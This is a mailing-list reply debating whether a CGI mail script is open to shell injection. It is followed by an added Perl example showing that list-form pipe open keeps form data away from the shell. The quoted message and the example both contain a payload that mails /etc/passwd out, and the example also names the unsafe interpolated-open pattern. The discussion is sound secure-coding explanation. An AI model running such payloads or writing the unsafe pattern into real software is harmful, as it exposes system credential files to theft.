* Wesley Wannemacher <[EMAIL PROTECTED]> [001113 15:09]:
> I could be a little bit off-base, but it might be a bad idea to
> approach your problem this way. For instance, what if a person enters
> somewhere in the form:
> `cat /etc/passwd | mail -s "You dumb f***, you just got hacked"
> [EMAIL PROTECTED]`

Where exactly would that line be exec'd? There is only one place in the
included code where stuff gets executed...there isn't any place to sneak
your little command to the shell.

> It is notoriously bad to /usr/lib/sendmail from a CGI script. Try

Nah, it isn't all that bad. Especially since he isn't passing any
possibly-tainted data to the shell (in the open() line).

/pg
-- 
Peter Green : Gospel Communications Network, SysAdmin : [EMAIL PROTECTED]
---
The wise man can pick up a grain of sand and envision a whole universe. But 
the stupid man will just lay down on some seaweed and roll around until he's 
completely draped in it. Then he'll stand up and go: Hey, I'm Vine Man.
 (Jack Handey)
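
The point made in the reply above, as an added example that is not part of the original thread or of the script being discussed: assuming the CGI script is Perl, form data written to the mailer's standard input is never parsed by a shell. The `%form` values and the `/bin/cat` stand-in for `/usr/lib/sendmail` are constructed for illustration.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Constructed form input: the "comment" field carries a backtick payload
# of the kind quoted in the thread (the address is a placeholder).
my %form = (
    comment => '`cat /etc/passwd | mail -s "hacked" someone@example.invalid`',
);

# Stand-in for the mailer so the example runs offline: cat copies its
# standard input to standard output, showing exactly what the mailer
# would have read. A real script would use:
#   ('/usr/lib/sendmail', '-t', '-oi')
my @mailer = ('/bin/cat', '-');

# List-form pipe open: Perl execs the program directly, /bin/sh is never
# started, and no form value appears anywhere on the command line.
open(my $mail, '|-', @mailer) or die "cannot start mailer: $!";

# Everything from the form goes down the pipe as message data. Backticks,
# pipes and quotes in it are just bytes in the mail body.
print {$mail} "To: webmaster\@example.invalid\n",
              "Subject: feedback form\n",
              "\n",
              "$form{comment}\n";

close($mail) or die "mailer exited with status $?";

# For contrast, the pattern that WOULD hand form data to the shell is a
# one-string open with a form value interpolated into the command, e.g.
#   open(MAIL, "|/usr/lib/sendmail $form{to}")
# because Perl passes a command string containing shell metacharacters
# to /bin/sh for parsing.
```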
